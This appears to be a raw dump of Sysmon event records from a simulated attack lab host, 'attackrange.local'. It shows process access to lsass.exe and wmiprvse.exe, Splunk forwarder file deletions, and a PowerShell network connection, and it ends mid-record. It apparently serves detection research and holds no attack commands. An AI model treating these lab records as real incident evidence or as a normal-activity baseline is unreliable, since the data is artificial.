10341000x800000000000000035083553Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:05:56.084{B81B27B7-4012-611D-0C00-00000000C801}7325640C:\Windows\system32\svchost.exe{B81B27B7-4D04-613A-1690-03000000C801}964C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035083552Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:05:56.084{B81B27B7-4012-611D-0C00-00000000C801}7325640C:\Windows\system32\svchost.exe{B81B27B7-4D04-613A-1690-03000000C801}964C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035083551Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:05:56.084{B81B27B7-4012-611D-0C00-00000000C801}7325640C:\Windows\system32\svchost.exe{B81B27B7-4D04-613A-1690-03000000C801}964C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035083550Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:05:56.084{B81B27B7-4012-611D-0C00-00000000C801}7325640C:\Windows\system32\svchost.exe{B81B27B7-4D04-613A-1690-03000000C801}964C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035083549Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:05:56.084{B81B27B7-4012-611D-0B00-00000000C801}6366276C:\Windows\system32\lsass.exe{B81B27B7-4D04-613A-1690-03000000C801}964C:\Windows\system32\wbem\wmiprvse.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\lsasrv.dll+24c07|C:\Windows\system32\lsasrv.dll+25d4d|C:\Windows\system32\lsasrv.dll+24a85|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035083548Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:05:56.084{B81B27B7-4012-611D-0B00-00000000C801}6366276C:\Windows\system32\lsass.exe{B81B27B7-4D04-613A-1690-03000000C801}964C:\Windows\system32\wbem\wmiprvse.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\system32\lsasrv.dll+249cd|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035083547Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:05:56.084{B81B27B7-4012-611D-0C00-00000000C801}7325640C:\Windows\system32\svchost.exe{B81B27B7-4012-611D-0B00-00000000C801}636C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+f86b|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035083546Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:05:56.084{B81B27B7-4012-611D-0C00-00000000C801}7325640C:\Windows\system32\svchost.exe{B81B27B7-4012-611D-0B00-00000000C801}636C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+f71b|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035083545Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:05:56.084{B81B27B7-4012-611D-0B00-00000000C801}6366276C:\Windows\system32\lsass.exe{B81B27B7-4013-611D-1600-00000000C801}1196C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\lsasrv.dll+1a18d|C:\Windows\system32\lsasrv.dll+2706b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035083544Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:05:56.053{B81B27B7-4013-611D-1600-00000000C801}11964628C:\Windows\system32\svchost.exe{B81B27B7-4D04-613A-1690-03000000C801}964C:\Windows\system32\wbem\wmiprvse.exe0x101541C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\wmiprvsd.dll+20fee|C:\Windows\system32\wbem\wmiprvsd.dll+43f7|C:\Windows\system32\wbem\wmiprvsd.dll+15538|C:\Windows\system32\wbem\wmiprvsd.dll+1498a|C:\Windows\system32\wbem\wmiprvsd.dll+146e6|C:\Windows\system32\wbem\wmiprvsd.dll+140fe|C:\Windows\system32\wbem\wbemcore.dll+2227|C:\Windows\system32\wbem\wbemcore.dll+13f4|C:\Windows\system32\wbem\wbemcore.dll+22adf|C:\Windows\system32\wbem\wbemcore.dll+22a19|C:\Windows\system32\wbem\wbemcore.dll+21f5a|C:\Windows\system32\wbem\wbemcore.dll+22711|C:\Windows\system32\wbem\wbemcore.dll+2d78c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035083543Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:05:56.052{B81B27B7-4012-611D-0C00-00000000C801}7325640C:\Windows\system32\svchost.exe{B81B27B7-4D04-613A-1690-03000000C801}964C:\Windows\system32\wbem\wmiprvse.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035083542Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:05:56.031{B81B27B7-4012-611D-0500-00000000C801}420436C:\Windows\system32\csrss.exe{B81B27B7-4D04-613A-1690-03000000C801}964C:\Windows\system32\wbem\wmiprvse.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000035083541Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:05:56.031{B81B27B7-4012-611D-0C00-00000000C801}7325640C:\Windows\system32\svchost.exe{B81B27B7-4D04-613A-1690-03000000C801}964C:\Windows\system32\wbem\wmiprvse.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6f453|C:\Windows\System32\KERNEL32.DLL+1d37f|c:\windows\system32\rpcss.dll+35069|c:\windows\system32\rpcss.dll+3a852|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035083540Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:05:56.015{B81B27B7-4012-611D-0C00-00000000C801}7325640C:\Windows\system32\svchost.exe{B81B27B7-4012-611D-0B00-00000000C801}636C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+f86b|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035083539Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:05:56.015{B81B27B7-4012-611D-0C00-00000000C801}7325640C:\Windows\system32\svchost.exe{B81B27B7-4012-611D-0B00-00000000C801}636C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+f71b|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035083538Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:05:56.015{B81B27B7-4012-611D-0B00-00000000C801}6366276C:\Windows\system32\lsass.exe{B81B27B7-4013-611D-1600-00000000C801}1196C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\lsasrv.dll+1a18d|C:\Windows\system32\lsasrv.dll+2706b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035083579Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:05:57.991{B81B27B7-4013-611D-1600-00000000C801}11965212C:\Windows\system32\svchost.exe{B81B27B7-4D05-613A-1890-03000000C801}5796C:\Windows\system32\wbem\wmiprvse.exe0x101541C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\wmiprvsd.dll+20fee|C:\Windows\system32\wbem\wmiprvsd.dll+2dbe|C:\Windows\system32\wbem\wmiprvsd.dll+155e9|C:\Windows\system32\wbem\wmiprvsd.dll+1498a|C:\Windows\system32\wbem\wmiprvsd.dll+146e6|C:\Windows\system32\wbem\wmiprvsd.dll+140fe|C:\Windows\system32\wbem\wbemcore.dll+2227|C:\Windows\system32\wbem\wbemcore.dll+13f4|C:\Windows\system32\wbem\wbemcore.dll+22adf|C:\Windows\system32\wbem\wbemcore.dll+22a19|C:\Windows\system32\wbem\wbemcore.dll+21f5a|C:\Windows\system32\wbem\wbemcore.dll+22711|C:\Windows\system32\wbem\wbemcore.dll+2d78c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035083578Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:05:57.960{B81B27B7-4012-611D-0C00-00000000C801}7325640C:\Windows\system32\svchost.exe{B81B27B7-4D05-613A-1890-03000000C801}5796C:\Windows\system32\wbem\wmiprvse.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035083577Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:05:57.887{B81B27B7-4012-611D-0500-00000000C801}420436C:\Windows\system32\csrss.exe{B81B27B7-4D05-613A-1890-03000000C801}5796C:\Windows\system32\wbem\wmiprvse.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000035083576Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:05:57.870{B81B27B7-4012-611D-0C00-00000000C801}7325640C:\Windows\system32\svchost.exe{B81B27B7-4D05-613A-1890-03000000C801}5796C:\Windows\system32\wbem\wmiprvse.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6f453|C:\Windows\System32\KERNEL32.DLL+1d37f|c:\windows\system32\rpcss.dll+35069|c:\windows\system32\rpcss.dll+3a852|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x800000000000000035083575Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:05:57.738{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=2E954DB553FC1439E7CA9D386C644258,SHA256=6D9732EF198A760FEFB26431B12D4688388342177C7C57FC37D929076BC76576,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000035083574Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:06:20.726{B81B27B7-4013-611D-2700-00000000C801}2076C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-987.attackrange.local56492-false10.0.1.12-8089- 23542300x800000000000000035083573Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:05:57.053{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=0BBF117CFE4162F91D4E6F23847E13ED,SHA256=B9AA09CFE6C1905433A2638880248C654FE99D0486AA05DB7C1DE4D54FE72FDA,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035083572Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:05:57.053{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=87820FF7B473DAA04385B3D9D253E6EA,SHA256=0536C5B9F5CE9ACDDDB204FF8CA21A989ED3122DDEDD732C76451B78940C9E93,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035083581Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:05:58.874{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=0BBF117CFE4162F91D4E6F23847E13ED,SHA256=B9AA09CFE6C1905433A2638880248C654FE99D0486AA05DB7C1DE4D54FE72FDA,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035083580Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:05:58.756{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D265AAE847CC30873F9EAF703E66DF74,SHA256=27583F956CC6AC6A2F81E383A6B2B7EB8D1770C404938CBFA664286B84893E6F,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035083582Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:05:59.789{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=6BCDD2B246226476EC0FA0B029E5B232,SHA256=C001DA8E6AC637A7FC9BCEF6A10766E5AF62348E118D28BAAA03B0EFAC534A4E,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035083583Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:06:00.819{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=EDD6B9E0F79717E9FA6D3CE0572983CB,SHA256=5253163D0AD0C2D918C3A792BBB9D8FE3CFBAEF821E2894D5D136101CC7179C8,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035083587Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:06:01.852{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C29EE5C0C27DD0EE49C89AC438474308,SHA256=25B6E1B944249CA6C3D80A08ECCE7B5A20A2DE33E8279F98CDBC460E247122DA,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000035083586Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:06:26.200{B81B27B7-4822-613A-788F-03000000C801}6940C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeATTACKRANGE\REED_SCHMIDTtcptruefalse10.0.1.15win-host-987.attackrange.local56494-false10.0.1.16ip-10-0-1-16.us-west-2.compute.internal443https 354300x800000000000000035083585Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:06:26.100{B81B27B7-401D-611D-6900-00000000C801}3616C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-987.attackrange.local56493-false10.0.1.12-8000- 23542300x800000000000000035083584Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:06:01.234{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program 